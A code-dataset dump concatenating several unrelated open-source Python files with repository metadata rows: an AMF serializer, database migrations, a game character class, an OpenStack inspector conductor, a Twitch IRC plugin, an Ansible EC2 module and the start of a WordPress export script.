cnt = struct.unpack('!L', stream.read(4))[0]
res = {}
context.add_complex(res)
for i in range(cnt):
key = self._read_string0(stream)
res[key] = self._read_item0(stream, context)
context.add_complex(res)
return res
elif marker == 0x0A: # strict array
cnt = struct.unpack('!L', stream.read(4))[0]
res = []
context.add_complex(res)
for i in range(cnt):
res.append(self._read_item0(stream, context))
return res
elif marker == 0x0B: # date
val = struct.unpack('!d', stream.read(8))[0]
res = datetime.datetime.utcfromtimestamp(val/1000)
tz = stream.read(2)
assert tz == b'\x00\x00'
return res
elif marker == 0x0C: # longstring
len = struct.unpack('!L', stream.read(4))[0]
return stream.read(len).decode('utf-8')
elif marker == 0x11: # AVM+
return self._read_item3(stream, context)
else:
raise NotImplementedError("Marker {:02x}".format(marker))
class Trait(object):
__slots__ = ('dynamic', 'classname', 'members')
def __init__(self, dynamic, classname, members=()):
self.dynamic = dynamic
self.members = tuple(members)
self.classname = classname
anonymous_trait = Trait(True, "")
class Dumper(object):
def dump(self, data, stream=None, proto=None, context=None):
# please keep it reentrant
if context is None:
context = WriteContext()
if proto == 0:
return self._write_item0(data, stream, context)
elif proto == 3:
return self._write_item3(data, stream, context)
else:
raise ValueError(proto)
def _write_item0(self, data, stream, context):
if isinstance(data, bool):
stream.write(b'\x01\x01' if data else b'\x01\x00')
elif isinstance(data, (float, int)):
stream.write(b'\x00' + struct.pack('!d', data))
elif isinstance(data, str):
if len(data) < 65536:
stream.write(b'\x02')
self._write_string0(data, stream, context)
else:
data = data.encode('utf-8')
stream.write(b'\x0c' + struct.pack('!L', len(data)))
stream.write(data)
elif isinstance(data, dict):
ref = context.get_complex(data)
if ref is not None:
stream.write(b'\x07' + struct.pack('!H', ref))
else:
context.add_complex(data)
stream.write(b'\x03')
for k, v in data.items():
self._write_string0(k, stream, context)
self._write_item0(v, stream, context)
self._write_string0("", stream, context)
stream.write(b'\x09')
elif data is None: # null
stream.write(b'\x05')
elif data is undefined: # undefined
stream.write(b'\x06')
elif isinstance(data, (list, tuple)): # strict array
ref = context.get_complex(data)
if ref is not None:
stream.write(b'\x07' + struct.pack('!H', ref))
else:
context.add_complex(data)
stream.write(b'\x0A' + struct.pack('!L', len(data)))
for i in data:
self._write_item0(i, stream, context)
elif isinstance(data, datetime.datetime):
stream.write(b'\x0b' + struct.pack('!d',
time.mktime(data.utctimetuple())*1000) + b'\x00\x00')
else:
raise NotImplementedError("Type {!r}".format(type(data)))
def _write_string0(self, data, stream, context):
data = data.encode('utf-8')
stream.write(struct.pack('!H', len(data)))
stream.write(data)
def _write_item3(self, data, stream, context):
if data is undefined:
stream.write(b'\x00')
elif data is None:
stream.write(b'\x01')
elif data is False:
stream.write(b'\x02')
elif data is True:
stream.write(b'\x03')
elif isinstance(data, int) and data >= 0 and data < (1 << 31):
stream.write(b'\x04')
self._write_vli(data, stream)
elif isinstance(data, (int, float)):
stream.write(b'\x05' + struct.pack('!d', data))
elif isinstance(data, str):
stream.write(b'\x06')
self._write_string3(data, stream, context)
elif isinstance(data, datetime.datetime):
stream.write(b'\x08')
ref = context.get_object(data)
if ref is not None:
self._write_vli((ref << 1), stream)
else:
self._write_vli(1, stream)
stream.write(struct.pack('!d',
time.mktime(data.utctimetuple())*1000))
context.add_object(data)
elif isinstance(data, dict):
stream.write(b'\x0A')
ref = context.get_object(data)
if ref is not None:
self._write_vli((ref << 1), stream)
else:
ref = context.get_trait(anonymous_trait)
if ref is not None:
self._write_vli((ref << 2)|1, stream)
else:
context.add_trait(anonymous_trait)
self._write_vli(11, stream)
self._write_string3(anonymous_trait.classname, stream, context)
for k, v in data.items():
self._write_string3(k, stream, context)
self._write_item3(v, stream, context)
self._write_string3("", stream, context)
elif isinstance(data, list):
stream.write(b'\x09')
ref = context.get_object(data)
if ref is not None:
self._write_vli((ref << 1), stream)
else:
context.add_object(data)
self._write_vli((len(data) << 1)|1, stream)
self._write_string3("", stream, context)
for i in data:
self._write_item3(i, stream, context)
elif isinstance(data, bytes):
stream.write(b'\x0C')
ref = context.get_object(data)
if ref is not None:
self._write_vli((ref << 1), stream)
else:
context.add_object(data)
self._write_vli((len(data) << 1)|1, stream)
stream.write(data)
else:
raise NotImplementedError("Type {!r}".format(type(data)))
def _write_vli(self, data, stream):
ba = bytearray()
if not data:
stream.write(b'\x00')
return
while data:
ba.append((data & 0x7f) | 0x80)
data >>= 7
ba.reverse()
ba[-1] &= 0x7f
stream.write(ba)
def _write_string3(self, data, stream, context):
ref = context.get_string(data)
if data and ref is not None:
self._write_vli(ref << 1, stream)
else:
if data:
context.add_string(data)
data = data.encode('utf-8')
self._write_vli((len(data) << 1)|1, stream)
stream.write(data)
class ReadContext(object):
def __init__(self):
self.strings = []
self.objects = []
self.traits = []
self.complex = []
def add_string(self, val):
self.strings.append(val)
def get_string(self, key):
return self.strings[key]
def add_object(self, val):
self.objects.append(val)
def get_object(self, key):
return self.objects[key]
def add_trait(self, val):
self.traits.append(val)
def get_trait(self, key):
return self.traits[key]
def add_complex(self, val):
self.complex.append(val)
def get_complex(self, key):
return self.complex[key]
class WriteContext(object):
def __init__(self):
self.strings = {}
self.nstrings = 0
self.objects = {}
self.nobjects = 0
self.traits = {}
self.ntraits = 0
self.complex = {}
self.ncomplex = 0
def add_string(self, val):
self.strings[val] = self.nstrings
self.nstrings += 1
def get_string(self, key):
return self.strings.get(key, None)
def add_object(self, val):
self.objects[id(val)] = self.nobjects
self.nobjects += 1
def get_object(self, key):
return self.objects.get(id(key), None)
def add_trait(self, val):
self.traits[val] = self.ntraits
self.ntraits += 1
def get_trait(self, key):
return self.traits.get(key, None)
def add_complex(self, val):
self.complex[id(val)] = self.ncomplex
self.ncomplex += 1
def get_complex(self, key):
return self.complex.get(id(key), None)
| mit | 762,591,521,325,786,100 | 32.911255 | 83 | 0.495117 | false |
EnvGen/BARM_web_server | migrations/versions/15045c53040_.py | 1 | 4868 | """empty message
Revision ID: 15045c53040
Revises: 80bab4f8ff
Create Date: 2016-01-07 10:21:05.812275
"""
# revision identifiers, used by Alembic.
revision = '15045c53040'
down_revision = '80bab4f8ff'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('annotation',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('annotation_type', sa.String(), nullable=True),
sa.Column('type_identifier', sa.String(), nullable=False),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('annotation_type', 'type_identifier', name='annotation_unique')
)
op.create_table('annotation_source',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('dbname', sa.String(), nullable=True),
sa.Column('dbversion', sa.String(), nullable=True),
sa.Column('algorithm', sa.String(), nullable=True),
sa.Column('algorithm_parameters', sa.String(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_table('reference_assembly',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_table('cog',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('category', sa.String(), nullable=True),
sa.ForeignKeyConstraint(['id'], ['annotation.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('ecnumber',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('first_digit', sa.Integer(), nullable=True),
sa.Column('second_digit', sa.Integer(), nullable=True),
sa.Column('third_digit', sa.Integer(), nullable=True),
sa.Column('fourth_digit', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['id'], ['annotation.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_ecnumber_first_digit'), 'ecnumber', ['first_digit'], unique=False)
op.create_index(op.f('ix_ecnumber_fourth_digit'), 'ecnumber', ['fourth_digit'], unique=False)
op.create_index(op.f('ix_ecnumber_second_digit'), 'ecnumber', ['second_digit'], unique=False)
op.create_index(op.f('ix_ecnumber_third_digit'), 'ecnumber', ['third_digit'], unique=False)
op.create_table('gene',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(), nullable=True),
sa.Column('reference_assemlby_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['reference_assemlby_id'], ['reference_assembly.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('pfam',
sa.Column('id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['id'], ['annotation.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('tigrfam',
sa.Column('id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['id'], ['annotation.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('gene_annotation',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('annotation_id', sa.Integer(), nullable=True),
sa.Column('gene_id', sa.Integer(), nullable=True),
sa.Column('e_value', sa.Float(), nullable=True),
sa.Column('annotation_source_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['annotation_id'], ['annotation.id'], ),
sa.ForeignKeyConstraint(['annotation_source_id'], ['annotation_source.id'], ),
sa.ForeignKeyConstraint(['gene_id'], ['gene.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('gene_id', 'annotation_id', 'annotation_source_id', name='gene_annotation_unique')
)
op.create_table('gene_count',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('sample_id', sa.Integer(), nullable=False),
sa.Column('gene_id', sa.Integer(), nullable=False),
sa.Column('rpkm', sa.Float(), nullable=True),
sa.ForeignKeyConstraint(['gene_id'], ['gene.id'], ),
sa.ForeignKeyConstraint(['sample_id'], ['sample.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('sample_id', 'gene_id', name='genecount_unique')
)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_table('gene_count')
op.drop_table('gene_annotation')
op.drop_table('tigrfam')
op.drop_table('pfam')
op.drop_table('gene')
op.drop_index(op.f('ix_ecnumber_third_digit'), table_name='ecnumber')
op.drop_index(op.f('ix_ecnumber_second_digit'), table_name='ecnumber')
op.drop_index(op.f('ix_ecnumber_fourth_digit'), table_name='ecnumber')
op.drop_index(op.f('ix_ecnumber_first_digit'), table_name='ecnumber')
op.drop_table('ecnumber')
op.drop_table('cog')
op.drop_table('reference_assembly')
op.drop_table('annotation_source')
op.drop_table('annotation')
### end Alembic commands ###
| gpl-2.0 | -2,371,235,589,855,736,000 | 40.965517 | 106 | 0.658381 | false |
google-research/world_models | objectives/objectives.py | 1 | 1961 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implementation of objectives."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gin
import numpy as np
import tensorflow.compat.v1 as tf
from typing import Dict, Text
class Objective(object):
"""Base class for objectives."""
def __call__(self, predictions: Dict[Text, np.ndarray]):
"""Calculates the reward from predictions.
Args:
predictions: a dictionary with possibly the following entries:
* "image": [batch, steps, height, width, channels] np array.
* "reward": [batch, steps, 1] np array.
Returns:
a [batch, 1] ndarray for the rewards.
"""
raise NotImplementedError
@gin.configurable
class RandomObjective(Objective):
"""A test objective that returns random rewards sampled from a normal dist."""
def __call__(self, predictions):
batch = predictions["image"].shape[0]
return np.random.normal(size=[batch, 1])
@gin.configurable
class DiscountedReward(Objective):
"""To be used with world model already predicting rewards."""
def __call__(self, predictions):
return np.sum(predictions["reward"], axis=1)
@gin.configurable
class TensorFlowDiscountedReward(Objective):
"""TensorFlow version of discounted reward."""
@tf.function
def __call__(self, predictions):
return tf.reduce_sum(predictions["reward"], axis=1)
| apache-2.0 | 5,443,015,263,609,577,000 | 28.712121 | 80 | 0.718001 | false |
GrognardsFromHell/TemplePlus | tpdatasrc/tpgamefiles/rules/char_class/class014_ranger.py | 1 | 2902 | from toee import *
import char_class_utils
import char_editor
###################################################
def GetConditionName(): # used by API
return "Ranger"
# def GetSpellCasterConditionName():
# return "Ranger Spellcasting"
def GetCategory():
return "Core 3.5 Ed Classes"
def GetClassDefinitionFlags():
return CDF_BaseClass | CDF_CoreClass
def GetClassHelpTopic():
return "TAG_RANGERS"
classEnum = stat_level_ranger
###################################################
class_feats = {
1: (feat_armor_proficiency_light, feat_shield_proficiency, feat_simple_weapon_proficiency, feat_martial_weapon_proficiency_all, feat_track),
4: (feat_animal_companion,),
9: (feat_evasion,)
}
class_skills = (skill_alchemy, skill_climb, skill_concentration, skill_craft, skill_handle_animal, skill_heal, skill_hide, skill_jump, skill_knowledge_nature, skill_listen, skill_move_silently, skill_profession, skill_ride, skill_search, skill_spot, skill_wilderness_lore, skill_swim, skill_use_rope)
spells_per_day = {
1: (-1,),
2: (-1,),
3: (-1,),
4: (-1,0),
5: (-1,0),
6: (-1,1),
7: (-1,1),
8: (-1,1, 0),
9: (-1,1, 0),
10: (-1,1, 1),
11: (-1,1, 1, 0),
12: (-1,1, 1, 1),
13: (-1,1, 1, 1),
14: (-1,2, 1, 1, 0),
15: (-1,2, 1, 1, 1),
16: (-1,2, 2, 1, 1),
17: (-1,2, 2, 2, 1),
18: (-1,3, 2, 2, 1),
19: (-1,3, 3, 3, 2),
20: (-1,3, 3, 3, 3)
#lvl 0 1 2 3 4 5 6 7 8 9
}
def GetHitDieType():
return 8
def GetSkillPtsPerLevel():
return 6
def GetBabProgression():
return base_attack_bonus_type_martial
def IsFortSaveFavored():
return 1
def IsRefSaveFavored():
return 1
def IsWillSaveFavored():
return 0
# Spell casting
def GetSpellListType():
return spell_list_type_ranger
def GetSpellSourceType():
return spell_source_type_divine
def GetSpellReadyingType():
return spell_readying_vancian
def GetSpellsPerDay():
return spells_per_day
caster_levels = [ int(x / 2) if x >= 4 else 0 for x in range(1, 21) ]
def GetCasterLevels():
return caster_levels
def GetSpellDeterminingStat():
return stat_wisdom
def IsClassSkill(skillEnum):
return char_class_utils.IsClassSkill(class_skills, skillEnum)
def IsClassFeat(featEnum):
return char_class_utils.IsClassFeat(class_feats, featEnum)
def GetClassFeats():
return class_feats
def IsAlignmentCompatible( alignment):
return 1
def ObjMeetsPrereqs( obj ):
return 1
def IsSelectingFeaturesOnLevelup( obj ):
newLvl = obj.stat_level_get( classEnum ) + 1
if newLvl == 1 or newLvl == 2 or (newLvl % 5) == 0:
return 1
return 0
def LevelupSpellsFinalize( obj, classLvlNew = -1 ):
classLvl = obj.stat_level_get(classEnum)
classLvlNew = classLvl + 1
if classLvlNew < 4: # late-starting caster
return 0
maxSpellLvl = char_editor.get_max_spell_level( obj, classEnum, classLvlNew )
class_spells = char_editor.get_learnable_spells(obj, classEnum, maxSpellLvl)
char_editor.spell_known_add(class_spells)
return 0 | mit | 5,280,413,577,871,603,000 | 21.858268 | 300 | 0.671606 | false |
openstack/ironic-inspector | ironic_inspector/conductor/manager.py | 1 | 8755 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import traceback as traceback_mod
from eventlet import semaphore
from futurist import periodics
from ironic_lib import mdns
from oslo_config import cfg
from oslo_log import log
import oslo_messaging as messaging
from oslo_utils import excutils
from oslo_utils import reflection
import tooz
from ironic_inspector.common import coordination
from ironic_inspector.common.i18n import _
from ironic_inspector.common import ironic as ir_utils
from ironic_inspector.common import keystone
from ironic_inspector import db
from ironic_inspector import introspect
from ironic_inspector import node_cache
from ironic_inspector.plugins import base as plugins_base
from ironic_inspector import process
from ironic_inspector.pxe_filter import base as pxe_filter
from ironic_inspector import utils
LOG = log.getLogger(__name__)
CONF = cfg.CONF
MANAGER_TOPIC = 'ironic_inspector.conductor'
class ConductorManager(object):
"""ironic inspector conductor manager"""
RPC_API_VERSION = '1.3'
target = messaging.Target(version=RPC_API_VERSION)
def __init__(self):
self._periodics_worker = None
self._zeroconf = None
self._shutting_down = semaphore.Semaphore()
self.coordinator = None
def init_host(self):
"""Initialize Worker host
Init db connection, load and validate processing
hooks, runs periodic tasks.
:returns None
"""
if CONF.processing.store_data == 'none':
LOG.warning('Introspection data will not be stored. Change '
'"[processing] store_data" option if this is not '
'the desired behavior')
else:
LOG.info('Introspection data will be stored in the %s backend',
CONF.processing.store_data)
db.init()
self.coordinator = None
try:
self.coordinator = coordination.get_coordinator(prefix='conductor')
self.coordinator.start(heartbeat=True)
self.coordinator.join_group()
except Exception as exc:
if CONF.standalone:
LOG.info('Coordination backend cannot be started, assuming '
'no other instances are running. Error: %s', exc)
self.coordinator = None
else:
with excutils.save_and_reraise_exception():
LOG.critical('Failure when connecting to coordination '
'backend', exc_info=True)
self.del_host()
else:
LOG.info('Successfully connected to coordination backend.')
try:
hooks = plugins_base.validate_processing_hooks()
except Exception as exc:
LOG.critical(str(exc))
sys.exit(1)
LOG.info('Enabled processing hooks: %s', [h.name for h in hooks])
driver = pxe_filter.driver()
driver.init_filter()
periodic_clean_up_ = periodics.periodic(
spacing=CONF.clean_up_period,
enabled=(CONF.clean_up_period != 0)
)(periodic_clean_up)
sync_with_ironic_ = periodics.periodic(
spacing=CONF.clean_up_period,
enabled=(CONF.clean_up_period != 0)
)(sync_with_ironic)
callables = [(periodic_clean_up_, None, None),
(sync_with_ironic_, (self,), None)]
driver_task = driver.get_periodic_sync_task()
if driver_task is not None:
callables.append((driver_task, None, None))
# run elections periodically if we have a coordinator
# that we were able to start
if (self.coordinator and self.coordinator.started):
periodic_leader_election_ = periodics.periodic(
spacing=CONF.leader_election_interval
)(periodic_leader_election)
callables.append((periodic_leader_election_, (self,), None))
self._periodics_worker = periodics.PeriodicWorker(
callables=callables,
executor_factory=periodics.ExistingExecutor(utils.executor()),
on_failure=self._periodics_watchdog)
utils.executor().submit(self._periodics_worker.start)
if CONF.enable_mdns:
endpoint = keystone.get_endpoint('service_catalog')
self._zeroconf = mdns.Zeroconf()
self._zeroconf.register_service('baremetal-introspection',
endpoint)
def del_host(self):
"""Shutdown the ironic inspector conductor service."""
if self.coordinator is not None:
try:
if self.coordinator.started:
self.coordinator.leave_group()
self.coordinator.stop()
except tooz.ToozError:
LOG.exception('Failed to stop coordinator')
if not self._shutting_down.acquire(blocking=False):
LOG.warning('Attempted to shut down while already shutting down')
return
pxe_filter.driver().tear_down_filter()
if self._periodics_worker is not None:
try:
self._periodics_worker.stop()
self._periodics_worker.wait()
except Exception as e:
LOG.exception('Service error occurred when stopping '
'periodic workers. Error: %s', e)
self._periodics_worker = None
if utils.executor().alive:
utils.executor().shutdown(wait=True)
if self._zeroconf is not None:
self._zeroconf.close()
self._zeroconf = None
self._shutting_down.release()
LOG.info('Shut down successfully')
def _periodics_watchdog(self, callable_, activity, spacing, exc_info,
traceback=None):
LOG.exception("The periodic %(callable)s failed with: %(exception)s", {
'exception': ''.join(traceback_mod.format_exception(*exc_info)),
'callable': reflection.get_callable_name(callable_)})
@messaging.expected_exceptions(utils.Error)
def do_introspection(self, context, node_id, token=None,
manage_boot=True):
introspect.introspect(node_id, token=token, manage_boot=manage_boot)
@messaging.expected_exceptions(utils.Error)
def do_abort(self, context, node_id, token=None):
introspect.abort(node_id, token=token)
@messaging.expected_exceptions(utils.Error)
def do_reapply(self, context, node_uuid, token=None, data=None):
if not data:
try:
data = process.get_introspection_data(node_uuid,
processed=False,
get_json=True)
except utils.IntrospectionDataStoreDisabled:
raise utils.Error(_('Inspector is not configured to store '
'introspection data. Set the '
'[processing]store_data configuration '
'option to change this.'))
else:
process.store_introspection_data(node_uuid, data, processed=False)
process.reapply(node_uuid, data=data)
@messaging.expected_exceptions(utils.Error)
def do_continue(self, context, data):
return process.process(data)
def periodic_clean_up(): # pragma: no cover
if node_cache.clean_up():
pxe_filter.driver().sync(ir_utils.get_client())
def sync_with_ironic(conductor):
if (conductor.coordinator is not None
and not conductor.coordinator.is_leader):
LOG.debug('The conductor is not a leader, skipping syncing '
'with ironic')
return
LOG.debug('Syncing with ironic')
ironic = ir_utils.get_client()
# TODO(yuikotakada): pagination
ironic_nodes = ironic.nodes(fields=["uuid"], limit=None)
ironic_node_uuids = {node.id for node in ironic_nodes}
node_cache.delete_nodes_not_in_list(ironic_node_uuids)
def periodic_leader_election(conductor):
if conductor.coordinator is not None:
conductor.coordinator.run_elect_coordinator()
return
| apache-2.0 | 7,348,057,273,560,102,000 | 36.097458 | 79 | 0.615877 | false |
rafaelnsantos/batfinancas | financas/migrations/0002_caixa_transacao.py | 1 | 1399 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2017-05-30 05:35
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('republica', '0001_initial'),
('financas', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Caixa',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('saldo', models.DecimalField(decimal_places=2, max_digits=8)),
('republica', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='republica.Republica')),
],
),
migrations.CreateModel(
name='Transacao',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('valor', models.DecimalField(decimal_places=2, max_digits=6)),
('data', models.DateField(default=django.utils.timezone.now)),
('descricao', models.CharField(max_length=100)),
('caixa', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='transacoes', to='financas.Caixa')),
],
),
]
| mit | -4,478,321,827,652,335,000 | 37.861111 | 138 | 0.596855 | false |
Jakeable/Ralybot | plugins/twitch.py | 1 | 3677 | import re
import html
from ralybot import hook
from ralybot.util import http
twitch_re = re.compile(r'(.*:)//(twitch.tv|www.twitch.tv)(:[0-9]+)?(.*)', re.I)
multitwitch_re = re.compile(r'(.*:)//(www.multitwitch.tv|multitwitch.tv)/(.*)', re.I)
def test_name(s):
valid = set('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_/')
return set(s) <= valid
def twitch_lookup(location):
locsplit = location.split("/")
if len(locsplit) > 1 and len(locsplit) == 3:
channel = locsplit[0]
_type = locsplit[1] # should be b or c
_id = locsplit[2]
else:
channel = locsplit[0]
_type = None
_id = None
fmt = "{}: {} playing {} ({})" # Title: nickname playing Game (x views)
if _type and _id:
if _type == "b": # I haven't found an API to retrieve broadcast info
soup = http.get_soup("http://twitch.tv/" + location)
title = soup.find('span', {'class': 'real_title js-title'}).text
playing = soup.find('a', {'class': 'game js-game'}).text
views = soup.find('span', {'id': 'views-count'}).text + " view"
views = views + "s" if not views[0:2] == "1 " else views
return html.unescape(fmt.format(title, channel, playing, views))
elif _type == "c":
data = http.get_json("https://api.twitch.tv/kraken/videos/" + _type + _id)
title = data['title']
playing = data['game']
views = str(data['views']) + " view"
views = views + "s" if not views[0:2] == "1 " else views
return html.unescape(fmt.format(title, channel, playing, views))
else:
data = http.get_json("https://api.twitch.tv/kraken/streams?channel=" + channel)
if data["streams"]:
title = data["streams"][0]["channel"]["status"]
playing = data["streams"][0]["game"]
v = data["streams"][0]["viewers"]
viewers = str(title) + " is currently " + "\x033\x02online!\x02\x0f " + str(v) + " viewer" + ("s are currently watching!" if v != 1 else "")
return html.unescape(fmt.format(title, channel, playing, viewers))
else:
try:
data = http.get_json("https://api.twitch.tv/kraken/channels/" + channel)
except Exception:
return "Unable to get channel data. Maybe the channel is on justin.tv instead of twitch.tv?"
title = data['status']
playing = data['game']
viewers = "The streamer is currently \x034\x02offline\x02\x0f. Try again later!"
return html.unescape(fmt.format(title, channel, playing, viewers))
@hook.regex(multitwitch_re)
def multitwitch_url(match):
usernames = match.group(3).split("/")
out = ""
for i in usernames:
if not test_name(i):
print("Not a valid username")
return None
if out == "":
out = twitch_lookup(i)
else:
out = out + " \x02|\x02 " + twitch_lookup(i)
return out
@hook.regex(twitch_re)
def twitch_url(match):
bit = match.group(4).split("#")[0]
location = "/".join(bit.split("/")[1:])
if not test_name(location):
print("Not a valid username")
return None
return twitch_lookup(location)
@hook.command('twitch', 'twitchtv')
def twitch(text):
"""<channel name> -- Retrieves the channel and shows it's offline/offline status"""
text = text.split("/")[-1]
if test_name(text):
location = text
else:
return "Not a valid channel name."
return twitch_lookup(location).split("(")[-1].split(")")[0].replace("Online now! ", "")
| gpl-3.0 | 7,622,407,225,456,648,000 | 37.705263 | 152 | 0.567038 | false |
atsaki/ansible-modules-extras | cloud/amazon/ec2_vpc_subnet_facts.py | 1 | 3740 | #!/usr/bin/python
#
# This is a free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This Ansible library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this library. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: ec2_vpc_subnet_facts
short_description: Gather facts about ec2 VPC subnets in AWS
description:
- Gather facts about ec2 VPC subnets in AWS
version_added: "2.0"
author: "Rob White (@wimnat)"
options:
filters:
description:
- A dict of filters to apply. Each dict item consists of a filter key and a filter value. See U(http://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeSubnets.html) for possible filters.
required: false
default: null
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# Note: These examples do not set authentication details, see the AWS Guide for details.
# Gather facts about all VPC subnets
- ec2_vpc_subnet_facts:
# Gather facts about a particular VPC subnet using ID
- ec2_vpc_subnet_facts:
filters:
subnet-id: subnet-00112233
# Gather facts about any VPC subnet with a tag key Name and value Example
- ec2_vpc_subnet_facts:
filters:
"tag:Name": Example
# Gather facts about any VPC subnet within VPC with ID vpc-abcdef00
- ec2_vpc_subnet_facts:
filters:
vpc-id: vpc-abcdef00
'''
try:
import boto.vpc
from boto.exception import BotoServerError
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
def get_subnet_info(subnet):
subnet_info = { 'id': subnet.id,
'availability_zone': subnet.availability_zone,
'available_ip_address_count': subnet.available_ip_address_count,
'cidr_block': subnet.cidr_block,
'default_for_az': subnet.defaultForAz,
'map_public_ip_on_launch': subnet.mapPublicIpOnLaunch,
'state': subnet.state,
'tags': subnet.tags,
'vpc_id': subnet.vpc_id
}
return subnet_info
def list_ec2_vpc_subnets(connection, module):
filters = module.params.get("filters")
subnet_dict_array = []
try:
all_subnets = connection.get_all_subnets(filters=filters)
except BotoServerError as e:
module.fail_json(msg=e.message)
for subnet in all_subnets:
subnet_dict_array.append(get_subnet_info(subnet))
module.exit_json(subnets=subnet_dict_array)
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
filters = dict(default=None, type='dict')
)
)
module = AnsibleModule(argument_spec=argument_spec)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
region, ec2_url, aws_connect_params = get_aws_connection_info(module)
if region:
try:
connection = connect_to_aws(boto.vpc, region, **aws_connect_params)
except (boto.exception.NoAuthHandlerFound, AnsibleAWSError), e:
module.fail_json(msg=str(e))
else:
module.fail_json(msg="region must be specified")
list_ec2_vpc_subnets(connection, module)
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
if __name__ == '__main__':
main()
| gpl-3.0 | 8,756,107,837,508,010,000 | 28.92 | 203 | 0.666845 | false |
stelund/bloggagratis_tools | wp_export.py | 1 | 6401 |
import time
import pytz
import datetime
UTC_TIMEZONE = pytz.timezone('UTC')
def format_pubdate(date):
# Mon, 02 Nov 2009 08:39:06 +0000
return date.astimezone(UTC_TIMEZONE).strftime(u'%a, %d %b %Y %H:%M:%S %z')
def format_isodate(date):
# 2009-11-02 09:39:06
return date.strftime(u'%Y-%m-%d %H:%M:%S')
def format_gmtdate(date):
# 2009-11-02 09:39:06
return date.astimezone(UTC_TIMEZONE).strftime(u'%Y-%m-%d %H:%M:%S')
def format_comments(comments):
format = u""" <wp:comment>
<wp:comment_id>%(comment_id)d</wp:comment_id>
<wp:comment_author><![CDATA[%(author)s]]></wp:comment_author>
<wp:comment_author_email>%(author_email)s</wp:comment_author_email>
<wp:comment_author_url>%(url)s</wp:comment_author_url>
<wp:comment_author_IP></wp:comment_author_IP>
<wp:comment_date>%(date)s</wp:comment_date>
<wp:comment_date_gmt>%(gmt_date)s</wp:comment_date_gmt>
<wp:comment_content><![CDATA[%(text)s]]></wp:comment_content>
<wp:comment_approved>1</wp:comment_approved>
<wp:comment_type></wp:comment_type>
<wp:comment_parent>0</wp:comment_parent>
<wp:comment_user_id>%(user_id)d</wp:comment_user_id>
</wp:comment>"""
for c in comments:
c['gmt_date'] = format_gmtdate(c['date'])
c['date'] = format_isodate(c['date'])
c['user_id'] = 0
c['author_email'] = ''
return u'\n'.join([format % comment for comment in comments])
def format_images(images, static_url):
format = u""" <item>
<title>%(name)s</title>
<link>%(url)s</link>
<pubDate>%(pubdate)s</pubDate>
<dc:creator><![CDATA[admin]]></dc:creator>
%(categories)s
<content:encoded><![CDATA[]]></content:encoded>
<excerpt:encoded><![CDATA[]]></excerpt:encoded>
<wp:post_id>%(post_id)d</wp:post_id>
<wp:post_parent>%(post_parent)d</wp:post_parent>
<wp:attachment_url>%(url)s</wp:attachment_url>
<wp:post_type>attachment</wp:post_type>
